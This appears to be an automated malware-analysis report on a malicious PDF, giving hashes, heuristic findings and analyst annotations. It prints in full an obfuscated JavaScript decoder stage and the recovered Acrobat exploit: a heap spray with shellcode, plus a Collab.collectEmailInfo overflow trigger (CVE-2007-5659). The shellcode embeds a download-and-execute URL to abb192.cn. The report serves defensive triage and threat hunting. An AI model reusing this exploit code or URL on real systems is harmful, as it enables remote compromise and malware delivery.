Malicious PDF — malware analysis report

Static analysis result for SHA-256 af08834115712db2…

MALICIOUS

PDF

4.5 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 5c20a4def15c73271f84bcd25aa1ed2f SHA-1: 4fc00e916bc4ec74296b1689b30573c984756315 SHA-256: af08834115712db22ead2da6b7dab204511ff30ed11938ae4b363f018f033446
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell — note: no PowerShell is present in any recovered stage of this sample; the only scripting engine observed is Acrobat JavaScript (T1059.007 JavaScript is the mapping the artifacts actually support). Treat the PowerShell tag as an auto-mapping error unless the downloaded second stage (not analysed here) is shown to use it.

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The eval() chain (PDF_EVAL) in the extracted artifact 'javascript_obj0013_001.js' is a string-splitting obfuscation layer around a 6-bit XOR-table decoder; static stage recovery decoded it to 'generic_stage_recovery_000.js'. That recovered stage is not ambiguous: it gates on app.viewerVersion (fires only on Adobe Reader builds before 7.1 / 8.1.2), heap-sprays 48 blocks of NOP sled plus shellcode targeting address 0x0c0c0c0c, and triggers the overflow by passing an oversized msg field to Collab.collectEmailInfo() (CVE-2007-5659). The shellcode embeds the second-stage URL http://abb192.cn/exp/load.php?id=5093&spl=4 as little-endian %uXXXX words, consistent with a download-and-execute downloader. Confidence in the malicious verdict is high; what remains unknown is the behaviour of the second stage, which was not retrieved.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation) In this sample the call is reached only after a version check on app.viewerVersion (major < 7, 7.0.x, 8.0.x, 8.1.0, 8.1.1), so patched Reader builds receive the spray setup but not the trigger.
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function VkNY4I(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function I6dvF(OVNbEycvBgE8pF){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(OVNbEycvBgE8pF)"+";"+"}");eval("function bgR9O(IOl9qjC){var vPzkInnzY="+"0,iYdjDpAr3gwa=IOl9qjC.l"+"en"+"gth,bxpP4=10"+"2"+"4,RBvNRJ0aAsmLd,qMYoWQrDNRrOPh,jDee937SB='',p5Tyhox5Nlb=vPzkInnzY,CoA6gZUNOxb=vPzkInnzY,Ck6iCGPpKso=vPzkInnzY,Ll85XisAX4F=Ar"+"ra"+"y(63,8,14,24,7 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/exp/load.php?id=5093&spl=4 Referenced by PDF JavaScript (carried inside the shellcode of generic_stage_recovery_000.js as the final 22 little-endian %uXXXX words, NUL-terminated). Handle as an indicator of compromise: block/hunt on the domain and path, do not fetch it from an analysis host.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x364 6273 bytes
SHA-256: d516ee51afe02edc666140e54b277b4dd29b12dbcfd65a5059de76a08b7a1e80
Detection
ClamAV: No threats found (single-engine scan of the carved fragment only; the obfuscated stage evades signature matching and this result does not lower the sample's verdict)
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Analyst annotation (not part of the carved artifact; the SHA-256 above is for the
// unannotated bytes). Dropper stage 1 from PDF /JS object 13. VkNY4I() wraps four
// eval() calls over strings split with "+" so that no API name appears whole:
//  1. implode(glue, pieces): Array.join, used to reassemble the payload string.
//  2. I6dvF(c): String.fromCharCode reached by bracket lookup.
//  3. bgR9O(s): custom decoder. Each input char is mapped through the 75-entry
//     table Ll85XisAX4F (index = charCode - 48, covering '0'..'z'; the entries for
//     ':'..'?', '['..'^' and '`' are 0, i.e. unused), 6 bits are shifted into an
//     accumulator, and every completed byte is emitted as fromCharCode(101 ^ byte)
//     — the "sixbit-xor-table" scheme named in the artifact list. Input is walked in
//     1024-char chunks. Hja1gC4Iw01 is the encoded payload, reassembled by implode
//     from the array literal below.
//  4. eval(bgR9O(Hja1gC4Iw01)) runs the decoded output, which is the artifact
//     generic_stage_recovery_000.js shown further down this page.
// The array literal is displayed wrapped by the page (e.g. 'Li' / 'iVDCj' are one
// token); the underlying file has no line breaks there. The preview ends at the
// function's closing brace; the statement that invokes VkNY4I() is presumably later
// in the 6273-byte artifact and is not shown here.
function VkNY4I(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function I6dvF(OVNbEycvBgE8pF){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(OVNbEycvBgE8pF)"+";"+"}");eval("function bgR9O(IOl9qjC){var vPzkInnzY="+"0,iYdjDpAr3gwa=IOl9qjC.l"+"en"+"gth,bxpP4=10"+"2"+"4,RBvNRJ0aAsmLd,qMYoWQrDNRrOPh,jDee937SB='',p5Tyhox5Nlb=vPzkInnzY,CoA6gZUNOxb=vPzkInnzY,Ck6iCGPpKso=vPzkInnzY,Ll85XisAX4F=Ar"+"ra"+"y(63,8,14,24,7,48,32,31,49,15,0,0,0,0,0,0,5,3,4,9,34,1,38,30,13,60,41,36,2,47,23,44,55,54,21,26,20,0,28,18,6,22,37,0,0,0,0,51,0,61,59,58,33,56,25,35,52,16,39,11,29,17,42,12,62,45,53,43,57,40,10,46,50,19,27);f"+"o"+"r(qMYoWQrDNRrOPh=M"+"at"+"h.c"+"ei"+"l(iYdjDpAr3gwa/"+"bxpP4)"+";qMYoWQrDNRrOPh>vPzkInnzY;qMYoWQrDNRrOPh-"+"-){fo"+"r(RBvNRJ0aAsmLd=Ma"+"th.m"+"in(iYdjDpAr3gwa,bxpP4);RBvNRJ0aAsmLd>vPzkInnzY;RBvNRJ0aAsmLd-"+"-,iYdjDpAr3gwa-"+"-){Ck6iCGPpKso|"+"=(Ll85XisAX4F[IOl9qjC.cha"+"rCod"+"eAt(p5Tyhox5Nlb+"+"+)-48])<"+"<CoA6gZUNOxb;if(CoA6gZUNOxb){jDee937SB+"+"=I6dvF"+"(101^Ck6iCGPpKso&"+"2"+"5"+"5);Ck6iCGPpKso>"+">="+"8;CoA6gZUNOxb-"+"="+"2;}el"+"se{CoA6gZUNOxb="+"6"+";}}"+"}return (jDee937SB);}var 
Hja1gC4Iw01=implode('',['@HEENTBvO5ZBkeLR9BR@','NRRm3RhLU1mmKV8@B5myot','Rm','AU','8L','XBEAvOim1hmAYBiAVtxRUe5Cr','hRyJ','iyRgIUkF1y','UCRB@H3RkThW1oRK4@Cm','Ao','KU','U@rTvh','Tr195DCxB5WCU5LLBmA9lRYTh','6Rqi','mkd5K4Ji','yR','gIUkF1yU','@tB','Y@Z','LH','RHxAO3DoEe','@X@ZLHRHxAO','3DoETBY@ZL','HRH','x','AO3DoEOK','@iV','6@','mVEA','k1iy','RZB@H3R','k','ThW1vl@yGRh@UBEBNOimJiy','RgIUkF1yUGRBX','@HU','Bk3','i','Bou5','L','@@x','TQhi1','156@xB','mkUB5AH8','TmGThB','BVmmCI8LWlDk','2uLE','PVg@OTB','Y@RR4Rf','iRXT','ZERf','6N@','HE','ENThoW85C0TBY','@E8LU3dEBTEUH','l','BiiBZRmf@iiBZRmf@iiBZRm','f@iiTr16','V','Lii3ZRilLiiorTF5@iihRRj','5@iih','R','RRm@','iiUx1Y','f','@i','i','UxR','mf@','iiUxCgiLi','iUWNRE@iiox16','3Lii','ox1goLiihrCW','HL','iiBx1','mELiiUx16oLi','ioRT6','oLi','iUD','RK','oLii5r1','y@@i','i','Br','R','g3@ii5r1y@@iio@161@iiUx','1Rf','@','iiUx16','V','LiioRT6oL','ii','V','L','NRf@iio@R','lC@iiULR','Ki@iiTZTRf@iiU','x1Tm@iiUx','16oLiiiLCyH@iiVL','N6VLii1ZTl','C@iio@TTm@iiTZT','6i@i','i','U','x1THLi','iUx16o','LiiiLCy','H@ii','VLN61@i','i3LClC@iiiRR','iHLii','TZTN@','LiiUx','1R@LiiUx16oLiiiL','Cy','H@iiV','LN63','@','ii','TRR','lC@iiTr1Nm@iiTZTlHLiiUx1','Yl','LiiU','x','16oLiii','L','CyH@ii','VLNgoL','i','i','V','@1lC@iiT@C','VH@iiTZTiC@iiUx1','N','8','@iiUx16oLiiiLCyH@iiix','1','gV','L','iiB','DTyHLii5@C','N','fL','i','iorTTE@','iioDTKiLiiUWNR','H@iiUx16U','LiiVLR6','oLii','5@CyH@iioRTFV','LiiUxCKiLiiUL1lE@','iio','RTjo@i','ioDTjiLiiT','ZTj','5@i','iUx1','y@@iiUx16o','LiihZT','joLi','ioLTd5@','ii','5r1FT@ii1','RNRC@iiUx16oL','iiorT6oLiioDRK','iLi','iV@Cy','@@','iiVr1yfL','iiorTjoL','ii3x1KiL','iiiRRlC','@iiU','x16oLiiVx1','6oLiiiLCy@@iih','@TgVLi','i','V','xT6','BLiiVLCy@@','iiTZTg1@iiUx1','lELii','Ux16oLiii','L','C63Lii','VRNF','oLiiVD','R6oLii3L','RVm@iiVRN','lmLiiUxCKo','Liih@CVC@iiUx16oLii','5@CTR@iio','RTFoLi','iUD','RKiLi','iUL','1lE@','i','io','RTjo@i','ioDT','jiLii','ix1RC@iiUx16o','Liih@T6oLiiVDT6h@iiiLC63LiiBDCFVLii','VDCY@@iiiRRj3Lii3x1','Vm','Li
iVDCj','oLiiiLCy@','@iih@','Tg3@iiV','xT6iL','iiV','LCy@','@i','iTZ','Tg1@','iiUx1F3LiiUx','16oLiiUx1lE@ii','5@CTR','@iioRTFo','LiiUDT','Ki','LiiUW','1','lE@iioRT','jo@iioDTjiLiiox1RC@iiUx16o','Liih@T6oLiio','RTTR@iiox1KiLi','iUL1lE@iioRT','jo@iioD','TjiLiiUx1RC@iiU','x1','6oLii','iL','16','oLiiVW1j','B@i','iT@163LiiT@1','63LiiT','@','16','3Li','iT@','163LiiTZRy','fLiiVLT6VLiioRTj3L','ii','TR','1Y','E','@iiVW1','T','r','@iiTr1T','R@iioRTji','LiioRTRf@ii','UD','TV','l@','iiVxRy@@ii','VLN63','@ii5ZCy@@i','ioRTd3@iioLRVlLi','iUDCVC@i','i','VL','N','TfLii5@Ny@@iiUDCF','o','LiiBD','CTf','Liii','xT','N','H@i','i','BrR','KU','Lii','VZC63LiiBD','C','j5@iiU','WRT8@iiox1im@i','iiR1dU','@','iiUDTVlLiiV@R','NELii','UDC','6V@iiix1T@Liii@1R@@iii@','R','dB@ii5@Cji@','iiVLTRmLiiTRT','y','@@','iiVLT','y@','@','iiU','DCFVLiih@N','Yl@ii','UDRy@@i','ioRTK','B@iioDRjU@ii','3r','R63LiiUx','Cy@@','iiUD','Cy@','@iiVLRNm','Lii','VR1jV@ii','Ux1','6','1@iiirC','RC@iii','RR','Tm@iiVLCT','R','@iiiDRjBLii','iW','RKV@iiUx','1Ki@ii','1R','Tyr','@ii1RRW','@@iiVr1YmLiio@RNHLiior','R','y','l@ii3@','NYm@iiV@','1','Yl@iio@1yf@','iio@','TNHLi','i1','RRWr@','iioZC','NHLiio@Ry','HLiiV@1y@@iioRNWR','@ii3','r1WR@iioRTy8@ii3','@TY@Li','i','3@NYR@','iiVrTYf','@ii1','RR','W','f','@','ii3R1y','fLiiTRRY@rmotRmyi','5@@d6HOuL95I5k','mIWm','3RTRl','BRRR','RR','RRt','R','m','yi5@@Z6CY@RkRZ6H@dR','m_1@AjI_W','CU5LLBmA@aTmNtRmyi','5@@mmAYrL@qBWm','3RBLQ5','DvI','U_A','MB8k@d','TmHZ6C','Y@RkRZ6','H2RR4','Yr@','yGR','hBBVmmJiyRgIUkF','1yU','@d','Rmi','OU','U','Y3UERUiy4EBBVR','@NREBBVR@NR','lByGRTvh','Tr195DCxBi','m3R','BLlh6@EhU','NwV@','U2VWH','lrTvhTr195D','CxBi','W','@mmAYrL@qBLyGRh','B','BVmm','hVETO','TZB@dRmHZ5','4k1r','C','we6','vBV_','H','Y5Wm1R','TRlBRRRRRRR8KW1','3Akn5Ao9IWBMeRmAu5@@r','hB','BVm','mhKW','Nq38R01','AU3RZNhKWN','q38','R01AUfm_@i8WRWe@HJ','hRkYVr9xU','6y28TmGTBvO5Z','BkeLR9BR@NRZ9h','KWNq38','R01','AUeTBY@','ZLH','R','H','xAO3DoETK','y@','H','gT','oVx9G','RBX','@dmm','AU8LXBEAv','Oi','mC','BA4NE
','@Hw3_4R3LkH8TmGThB','B','VmmlBR','TooZT7','oD@Q','TB','Y@','m','i@R','OhBoU6BUV','8oUVd@ou5Lk@','dLQB8@oO6UH','8KN@rmTm','85','TW','a','81Y3ym3R','T4m@@AyCr4g3dHklEUR','KUEX','UiyvZ','y1vCiW','4lByGRhBBVm','m','VIxRJBy','m','3RhL','U1mmKV8@B5mylBRTooZT7oD','@QOKEH','i5@','KBmyR8TWlBRTo','oZT7oD@QOKEHi5@KBmy','T8TWlBRTooZT7oD@','QO','K','EHi5@KBmyN8ByGR','BA','A','T','TyH88kNZWopT','@2@d@Y@rRmAHTmH','rB4MVRv8eAR','eTB','Y3R','BR@Hhi@88kNZWo','pV@2@Z','RmN8TmfK','mmVIxRJBg9Td','ymf','RB','Ro8Tmf','K','mmH','88kNZWopT@2@d@Y','@CR','mAHTmVIxRJ','B','g9Td','ymfRB','R','oRTXfTTyVIx','RJBg9Rdy','mfRK','To','8TmG','TT','1yfyAd6UAY1yBqUiU','9hB','yGRhB','BVm','mMVxHUB','x','oirA','4idWm3','RBBkU6@Xii@','U','hh','mUEmRXTZE','UEm','RXT','ZE48KN@CmA','oKUUHaxCPUi1_U','R9V','U@vkZU','Uk1iBHT','T','Y','@','@RTVErRoRhk','jVAUdoATa5E','TuTKy3RhkjVAUdoATa5ETueRmm','hUAYO','KEvKiLBV6','Hmu5@UTBY@','fDLCKUE4OKEv','K','iLU','3iB66UEoKU','k','ko6LHtd@i','V','5A7','Rhm4ZB','L','Y','15N','@axC','PUi1_UR9V','U','@v35KN@dmm3TTL85','8','RimgkQIm@F5Wyot@']);");eval(bgR9O(Hja1gC4Iw01));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x364 2555 bytes
SHA-256: fc391d89d1675bc6be514b66e5859247ee3a8fd817ea54ea3b06760a1dc08888
Detection
ClamAV: No threats found (single-engine scan of the recovered stage only; absence of a signature hit carries no weight against the heuristic findings above)
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Analyst annotation (not part of the carved artifact; the SHA-256 above is for the
// unannotated bytes). This is the stage decoded from the eval() chain in
// javascript_obj0013_001.js. Read top to bottom:
//  - MI9wnK1j4p20: global array that keeps the heap-spray blocks alive.
//  - mxhsdh9K2ekBP8(s, n): doubles s until s.length*2 >= n, then cuts it to n/2
//    UTF-16 units, i.e. a filler of exactly n bytes.
//  - D6ShDmisWtHedj(): heap spray. V7iBZ is the shellcode as little-endian %uXXXX
//    words. Each block is a %u9090 sled (0x90 = x86 NOP) followed by the shellcode,
//    padded so the pair is 0x400000 - 0x38 bytes; the loop bound is
//    (0x0c0c0c0c - 0x400000) / 0x400000 = ~47.19, so 48 blocks (~192 MiB) are
//    allocated to make address 0x0c0c0c0c land inside a sled. The final 22 words of
//    V7iBZ decode to the ASCII string "http://abb192.cn/exp/load.php?id=5093&spl=4"
//    plus a NUL — the second-stage URL reported by PDF_JS_SHELLCODE_DOWNLOAD_URL. The
//    words before it (%u0FEB = short jmp, repeated 0xEF/0xAA bytes) look like a
//    small self-decoding stub over an encoded body — TODO(review): confirm by
//    disassembly; the downloader behaviour is inferred from the URL, not traced.
//  - lTy25QKSzpCI(): version gate. app.viewerVersion is reduced to its digits and
//    the first three are compared as major/minor/patch. The condition holds for
//    major < 7, 7.0.x, 8.0.x, 8.1.0 and 8.1.1 — i.e. Reader builds before 7.1 / 8.1.2,
//    consistent with the CVE-2007-5659 fix level (confirm against the vendor
//    advisory). When it holds, the spray runs, a string of %u0c0c is doubled from 2
//    units until >= 44952 (ends at 65536 units = 0x0c0c0c0c repeated), and that
//    string is passed as msg to Collab.collectEmailInfo({subj: "", msg: ...}); the
//    oversized field is the overflow trigger and 0x0c0c0c0c is the value the
//    corrupted pointer is meant to take. The result is parked on this.collabStore.
// Note the == comparisons coerce the digit strings to numbers. Uses Acrobat-only
// globals (app, Collab) — this does not execute outside Adobe Reader's JavaScript
// engine and must not be run on an analysis host with a vulnerable Reader.
var MI9wnK1j4p20 = new Array(); function mxhsdh9K2ekBP8(LQ0FjICWd, qh3HqHD) { while (LQ0FjICWd.length*2<qh3HqHD){LQ0FjICWd += LQ0FjICWd;} LQ0FjICWd = LQ0FjICWd.substring(0,qh3HqHD/2); return LQ0FjICWd; } function D6ShDmisWtHedj() { var lzn7BKkOaRRsI = 0x0c0c0c0c; var V7iBZ = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u353D%u3930%u2633%u7073%u3D6C%u0034"); var mSIOYUjJtJ = 0x400000; var lC34H0lS = V7iBZ.length * 2; var qh3HqHD = mSIOYUjJtJ - (lC34H0lS+0x38); var LQ0FjICWd = unescape("%u9090%u9090"); LQ0FjICWd = mxhsdh9K2ekBP8(LQ0FjICWd, qh3HqHD); var Qr5I0w = (lzn7BKkOaRRsI - 0x400000)/mSIOYUjJtJ; for (var QL8Hs2ZWe=0;QL8Hs2ZWe<Qr5I0w;QL8Hs2ZWe++) { MI9wnK1j4p20[QL8Hs2ZWe] = LQ0FjICWd + 
V7iBZ; } } function lTy25QKSzpCI() { var x44i67zFsS = app.viewerVersion.toString(); x44i67zFsS = x44i67zFsS.replace(/\D/g,""); var yJ2LT = new Array(x44i67zFsS.charAt(0),x44i67zFsS.charAt(1),x44i67zFsS.charAt(2)); if ((yJ2LT[0] == 8 && ((yJ2LT[1] == 1 && yJ2LT[2] < 2) || yJ2LT[1] < 1)) || (yJ2LT[0] == 7 && yJ2LT[1] < 1) || (yJ2LT[0] < 7)) { D6ShDmisWtHedj(); var JBReDV5Xy5M = unescape("%u0c0c%u0c0c"); while(JBReDV5Xy5M.length < 44952) JBReDV5Xy5M += JBReDV5Xy5M; this.collabStore = Collab.collectEmailInfo({subj: "",msg: JBReDV5Xy5M}); } } lTy25QKSzpCI();